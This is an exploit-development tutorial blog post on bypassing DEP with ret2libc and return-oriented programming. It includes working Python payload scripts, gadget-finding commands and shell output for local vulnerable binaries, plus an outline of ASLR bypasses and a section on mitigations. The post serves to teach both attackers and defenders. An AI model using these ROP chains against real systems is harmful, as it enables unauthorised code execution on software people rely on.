Thilan Dissanayaka Exploit Development April 05, 2020

Bypassing DEP with Return-Oriented Programming (ROP)

In the Linux buffer overflow tutorial and the Windows buffer overflow tutorial, we exploited stack overflows by injecting shellcode onto the stack and redirecting EIP to execute it. It worked because we disabled DEP (Data Execution Prevention).

But in the real world, DEP is on. The stack is marked as non-executable. Even if our shellcode lands perfectly in memory, the CPU refuses to execute it — the NX bit in the page table says “this is data, not code.”

So how do modern exploits achieve code execution when they can’t inject code?

The answer is Return-Oriented Programming (ROP). Instead of injecting new code, we reuse code that already exists in the process — fragments of legitimate functions in the executable and its loaded libraries. We chain these fragments together to build an arbitrary program, one instruction at a time.

ROP is the single most important technique in modern binary exploitation. If you understand ROP, you understand how real-world exploits work.

Why DEP Kills Traditional Shellcode

Let’s be clear about what DEP does. Every memory page has permission flags:

.text  (code)  → Read + Execute     (RX)
.data  (data)  → Read + Write       (RW)
Stack          → Read + Write       (RW)  ← NO Execute
Heap           → Read + Write       (RW)  ← NO Execute

When we overflow the buffer and write shellcode to the stack, it sits in an RW page. When we redirect EIP to our shellcode, the CPU checks the page permissions, sees there’s no Execute flag, and raises an access violation.

Before DEP:  Stack = RWX → shellcode runs fine
After DEP:   Stack = RW  → "Access Violation: attempted to execute non-executable memory"

We can write anything to the stack. We just can’t execute what we write. So we need a different approach.

The Core Idea — Reusing Existing Code

Here’s the key insight: the .text section of the executable and its loaded DLLs (libc, kernel32, ntdll, etc.) are already executable. These are legitimate code pages with the Execute permission. We can’t inject new code, but we can jump to code that’s already there.

The simplest version of this is ret2libc — return to a libc function.

ret2libc — The Predecessor to ROP

Instead of returning to shellcode, we overwrite the return address with the address of a libc function — like system(). Then we arrange the stack so that system() receives the argument "/bin/sh".

The stack layout:

| buffer padding | EBP | system() addr | return after system | "/bin/sh" addr |

When the vulnerable function returns:

ret pops system() address into EIP
CPU jumps to system() — which is in an executable page (libc)
system() reads its argument from the stack — the address of "/bin/sh"
system("/bin/sh") executes — shell spawned

No shellcode needed. We just called an existing function with our own arguments.

Finding the Addresses

# Find system() address in libc
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e42da0 <__libc_system>

# Find "/bin/sh" string in libc (libc contains this string!)
(gdb) find &system, +9999999, "/bin/sh"
0xf7f588cf

# Find exit() for clean termination
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7e369e0 <__GI_exit>

The Exploit

import struct

offset = 76  # padding to reach return address (varies per binary)

system_addr = struct.pack("<I", 0xf7e42da0)
exit_addr   = struct.pack("<I", 0xf7e369e0)
binsh_addr  = struct.pack("<I", 0xf7f588cf)

# Stack layout after overflow:
# [padding] [system()] [exit()] ["/bin/sh"]
#                       ^return   ^argument
payload = b"A" * offset + system_addr + exit_addr + binsh_addr

with open("payload", "wb") as f:
    f.write(payload)

$ (cat payload; cat) | ./vulnerable
ls
exploit.py  payload  vulnerable  vulnerable.c
whoami
thilan

Shell spawned. No shellcode. No executable stack. DEP is still on.

Limitations of ret2libc

ret2libc works for simple cases, but it’s limited:

You can only call whole functions
Complex multi-step operations (like setting up a socket for a reverse shell) require chaining many function calls with carefully arranged arguments
On x86-64, arguments are passed in registers (rdi, rsi, rdx), not the stack — so you need to control registers too

This is where ROP comes in.

Return-Oriented Programming — The Full Technique

ROP generalizes ret2libc. Instead of jumping to whole functions, we jump to small fragments of code that end with a ret instruction. These fragments are called gadgets.

What’s a Gadget?

A gadget is a short sequence of instructions ending with ret. They exist naturally throughout the executable and its libraries — they’re just the tail ends of real functions.

; Gadget 1: pop eax; ret
0x08048456:  pop eax
0x08048457:  ret

; Gadget 2: pop ebx; ret
0x0804862a:  pop ebx
0x0804862b:  ret

; Gadget 3: mov [eax], ebx; ret
0x08048734:  mov dword [eax], ebx
0x08048736:  ret

; Gadget 4: xor eax, eax; ret
0x08048512:  xor eax, eax
0x08048514:  ret

Each gadget does one small thing — pop a value into a register, move data, perform arithmetic — and then returns. The ret instruction pops the next address from the stack into EIP, jumping to the next gadget.

How ROP Chains Work

The ret instruction does one thing: pop EIP. It takes the 4-byte value at the top of the stack, puts it in EIP, and increments ESP by 4.

In a normal program, ret returns to the caller. But if we control the stack (via buffer overflow), we control what ret pops. We can make it pop any address — the address of our next gadget.

Stack (after overflow):
┌─────────────────────┐  ← ESP after first ret
│ Address of Gadget 1  │  → pop eax; ret
├─────────────────────┤
│ Value for EAX        │  → popped by "pop eax"
├─────────────────────┤
│ Address of Gadget 2  │  → pop ebx; ret  (popped by "ret" of Gadget 1)
├─────────────────────┤
│ Value for EBX        │  → popped by "pop ebx"
├─────────────────────┤
│ Address of Gadget 3  │  → mov [eax], ebx; ret
├─────────────────────┤
│ Address of Gadget 4  │  → next operation...
├─────────────────────┤
│ ...                  │
└─────────────────────┘

Execution flow:

Vulnerable function’s ret pops Gadget 1 address → jumps to pop eax; ret
pop eax loads our value into EAX. ret pops Gadget 2 address → jumps there
pop ebx loads our value into EBX. ret pops Gadget 3 address → jumps there
mov [eax], ebx writes EBX to the address in EAX. ret pops next address…

Each ret acts as the “glue” between gadgets. The stack becomes our program, and each entry is either a gadget address or data.

This is Turing-complete. With enough gadgets, we can perform any computation — arithmetic, memory reads/writes, system calls, function calls. We’re building a program out of fragments of existing code.

Finding Gadgets

You don’t search for gadgets by hand. Tools do this automatically.

ROPgadget

$ ROPgadget --binary ./vulnerable

Gadgets information
============================================================
0x080485a6 : pop eax ; ret
0x080485f7 : pop ebx ; ret
0x0804861a : pop ecx ; pop edx ; ret
0x08048734 : mov dword ptr [eax], ebx ; ret
0x08048512 : xor eax, eax ; ret
0x080484f1 : inc eax ; ret
0x08048423 : int 0x80 ; ret
...

Unique gadgets found: 147

ropper

$ ropper --file ./vulnerable --search "pop eax"

[INFO] Searching for gadgets: pop eax
0x080485a6: pop eax; ret;
0x080487c3: pop eax; pop ebx; ret;

Searching in libc (many more gadgets)

$ ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 | wc -l
12847

libc alone contains thousands of useful gadgets. The more code loaded into the process, the more gadgets available.

Practical Example — execve() via ROP on Linux

Let’s build a ROP chain that calls execve("/bin/sh", NULL, NULL) — the same thing our shellcode did, but without any injected code.

On 32-bit Linux, the execve syscall requires:

EAX = 11 (syscall number for execve)
EBX = pointer to "/bin/sh"
ECX = NULL (argv)
EDX = NULL (envp)
then: int 0x80

We need to:

Write the string “/bin/sh” somewhere in writable memory
Set EAX = 11
Set EBX = address of “/bin/sh”
Set ECX = 0
Set EDX = 0
Execute int 0x80

Step 1: Find Gadgets

$ ROPgadget --binary ./vulnerable --search "pop eax"
0x080485a6 : pop eax ; ret

$ ROPgadget --binary ./vulnerable --search "pop ebx"
0x080485f7 : pop ebx ; ret

$ ROPgadget --binary ./vulnerable --search "pop ecx"
0x0804861a : pop ecx ; pop edx ; ret    # bonus: sets both ECX and EDX!

$ ROPgadget --binary ./vulnerable --search "int 0x80"
0x08048423 : int 0x80

Step 2: Find a Writable Location

We need somewhere to write “/bin/sh”. The .data or .bss section is writable:

$ readelf -S ./vulnerable | grep -E "\.data|\.bss"
  [24] .data    PROGBITS  0804a020  001020  000008  00  WA  0   0  4
  [25] .bss     PROGBITS  0804a028  001028  000004  00  WA  0   0  1

We’ll write to 0x0804a028 (.bss section).

Step 3: Build the Chain

import struct

p = lambda x: struct.pack("<I", x)

# Gadget addresses (found with ROPgadget)
pop_eax     = 0x080485a6
pop_ebx     = 0x080485f7
pop_ecx_edx = 0x0804861a
mov_eax_ebx = 0x08048734  # mov dword [eax], ebx; ret
int_0x80    = 0x08048423
xor_eax     = 0x08048512  # xor eax, eax; ret
inc_eax     = 0x080484f1  # inc eax; ret

writable    = 0x0804a028  # .bss section

offset = 76  # padding to return address

payload = b"A" * offset

# --- Write "/bin" to .bss ---
payload += p(pop_eax)
payload += p(writable)       # EAX = address to write to
payload += p(pop_ebx)
payload += b"/bin"           # EBX = "/bin" (4 bytes)
payload += p(mov_eax_ebx)   # write "/bin" to [.bss]

# --- Write "/sh\x00" to .bss+4 ---
payload += p(pop_eax)
payload += p(writable + 4)   # EAX = .bss + 4
payload += p(pop_ebx)
payload += b"/sh\x00"        # EBX = "/sh\0"
payload += p(mov_eax_ebx)   # write "/sh\0" to [.bss+4]

# --- Set up registers for execve ---
payload += p(pop_ebx)
payload += p(writable)       # EBX = pointer to "/bin/sh"

payload += p(pop_ecx_edx)
payload += p(0)              # ECX = NULL (argv)
payload += p(0)              # EDX = NULL (envp)

# --- Set EAX = 11 (execve syscall number) ---
payload += p(xor_eax)       # EAX = 0
for _ in range(11):
    payload += p(inc_eax)   # EAX++ eleven times

# --- Trigger syscall ---
payload += p(int_0x80)      # execve("/bin/sh", NULL, NULL)

with open("payload", "wb") as f:
    f.write(payload)

$ (cat payload; cat) | ./vulnerable
whoami
thilan
id
uid=1000(thilan) gid=1000(thilan) groups=1000(thilan)

Shell spawned. DEP is on. No shellcode was injected. Every instruction we executed was already in the binary’s .text section. We just jumped to them in the right order.

ROP on x86-64

On 64-bit systems, function arguments go in registers (rdi, rsi, rdx, rcx, r8, r9), not on the stack. This actually makes ROP easier in some ways — we just need pop rdi; ret gadgets to set up arguments.

For calling system("/bin/sh"):

# 64-bit ROP chain
pop_rdi = 0x00400753        # pop rdi; ret (found with ROPgadget)
binsh   = 0x7ffff7f588cf    # address of "/bin/sh" in libc
system  = 0x7ffff7e42da0    # system() in libc
exit_fn = 0x7ffff7e369e0    # exit() in libc

payload = b"A" * offset
payload += p64(pop_rdi)      # pop rdi; ret
payload += p64(binsh)        # rdi = "/bin/sh"
payload += p64(system)       # call system("/bin/sh")
payload += p64(pop_rdi)      # pop rdi; ret (clean up)
payload += p64(0)            # rdi = 0
payload += p64(exit_fn)      # call exit(0)

Cleaner than the 32-bit version — one gadget to set the argument, one call to system().

Stack Alignment on x86-64

On 64-bit Linux, the System V ABI requires the stack to be 16-byte aligned before a call instruction. If your ROP chain doesn’t maintain alignment, system() or other libc functions may crash with a segfault on a movaps instruction (which requires 16-byte alignment).

The fix: add a single ret gadget before the function call to adjust the stack by 8 bytes.

ret_gadget = 0x00400754  # just "ret"

payload += p64(ret_gadget)   # align the stack
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)

ROP on Windows

Windows ROP works the same way conceptually, but the calling convention and syscall interface differ.

On 32-bit Windows, you typically ROP into Windows API functions:

VirtualProtect() — Change memory page permissions (make the stack executable, then jump to shellcode)
VirtualAlloc() — Allocate a new RWX memory region, copy shellcode there, jump to it
WriteProcessMemory() — Write shellcode to an executable region

The most common approach is to use ROP to call VirtualProtect() and make the stack executable, then jump to your shellcode normally:

ROP chain:
Set up arguments for VirtualProtect(stack_addr, size, PAGE_EXECUTE_READWRITE, &old_protect)
Call VirtualProtect()
Stack is now executable
Jump to shellcode on the stack

This is called ROP to VirtualProtect — the classic Windows DEP bypass.

ASLR — The Next Challenge

We’ve bypassed DEP with ROP. But there’s another protection we’ve been ignoring: ASLR (Address Space Layout Randomization).

ASLR randomizes the base addresses of:

The executable (if PIE — Position Independent Executable)
Shared libraries (libc, etc.)
The stack
The heap

This means the gadget addresses we hardcoded change every run. Our ROP chain breaks because the gadgets aren’t where we expect them.

Defeating ASLR

ASLR is bypassed through information leaks — bugs that reveal memory addresses at runtime:

Format string vulnerabilities — printf(user_input) can leak stack contents, including return addresses and libc pointers.

Partial overwrite — ASLR on 32-bit systems only randomizes the upper bytes. The lower 12 bits of library addresses are always the same (page alignment). A 1-byte or 2-byte overwrite can redirect execution without knowing the full address.

Information disclosure bugs — Buffer over-reads, uninitialized memory, error messages containing addresses.

Brute force (32-bit only) — On 32-bit Linux, ASLR has only ~8-12 bits of entropy for libraries. That’s 256-4096 possible positions. With a forking server (that doesn’t re-randomize), you can brute-force the correct address in seconds.

The typical attack flow:

Exploit info leak to discover libc base address
Calculate gadget addresses: gadget = libc_base + known_offset
Build ROP chain with correct addresses
Send ROP chain → shell

This is why modern exploitation often requires two-stage attacks: first leak an address, then exploit.

Automated ROP Chain Generation

Building ROP chains by hand is educational but tedious. Tools can generate them automatically:

pwntools (Python)

from pwn import *

elf = ELF('./vulnerable')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
rop = ROP(elf)

# Automatically find gadgets and build a chain
rop.call('system', [next(libc.search(b'/bin/sh'))])
rop.call('exit', [0])

payload = b"A" * offset + rop.chain()

ROPgadget automatic chain

$ ROPgadget --binary ./vulnerable --ropchain

ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets
  [+] Gadget found: 0x08048734 mov dword ptr [eax], ebx ; ret
  ...

- Step 5 -- Syscall gadget
  [+] Gadget found: 0x08048423 int 0x80

ROP chain:
p = b""
p += pack('<I', 0x080485a6) # pop eax; ret
p += pack('<I', 0x0804a028) # .bss address
...

These tools search the binary for gadgets and automatically construct chains for common operations (execve, mprotect, etc.).

Mitigations Against ROP

The security community hasn’t been standing still:

Control Flow Integrity (CFI) — Validates that indirect jumps and returns go to legitimate targets. Implemented in Clang/LLVM as CFI and in Windows as Control Flow Guard (CFG).

Shadow Stacks — A separate, protected copy of the return address. On ret, the hardware compares the stack’s return address with the shadow stack. A mismatch indicates a ROP attack. Intel CET (Control-flow Enforcement Technology) implements this in hardware.

Stack Canaries — Random values placed before the return address. Overwriting the return address also overwrites the canary, which is detected before ret executes. Doesn’t prevent ROP directly but makes traditional buffer overflow harder.

ASLR with high entropy — 64-bit ASLR has much more entropy than 32-bit, making brute force impractical. Combined with PIE (position-independent executables), every code address is randomized.

Restricted gadget availability — Compilers can be configured to reduce the number of useful gadgets by aligning returns, eliminating unnecessary code, and using alternative instruction sequences.

Despite all these mitigations, ROP remains a viable technique. Each mitigation raises the bar, but creative attackers continue to find ways around them. That’s the arms race of exploit development.

Summary

Concept	What It Does
DEP/NX	Makes stack/heap non-executable — kills traditional shellcode
ret2libc	Return to libc functions — simplest DEP bypass
ROP	Chain gadgets (instruction fragments ending in `ret`) — full DEP bypass
Gadgets	Small instruction sequences in existing code, ending with `ret`
ROP Chain	Stack layout where each entry is a gadget address or data
ASLR	Randomizes addresses — requires info leak to bypass
Tools	ROPgadget, ropper, pwntools — automate gadget finding and chain building

The progression of exploit development tells a story:

Classic overflow — Inject shellcode, jump to it. Stopped by DEP.
ret2libc — Call existing functions. Limited to whole functions.
ROP — Chain gadgets for arbitrary computation. Bypasses DEP completely.
ROP + info leak — Defeat ASLR by discovering addresses at runtime.
Advanced mitigations — CFI, shadow stacks, CET. The arms race continues.

Understanding ROP is essential for both attackers and defenders. If you’re doing exploit development, it’s your primary tool. If you’re doing defense, it’s what you’re defending against.

Happy reversing!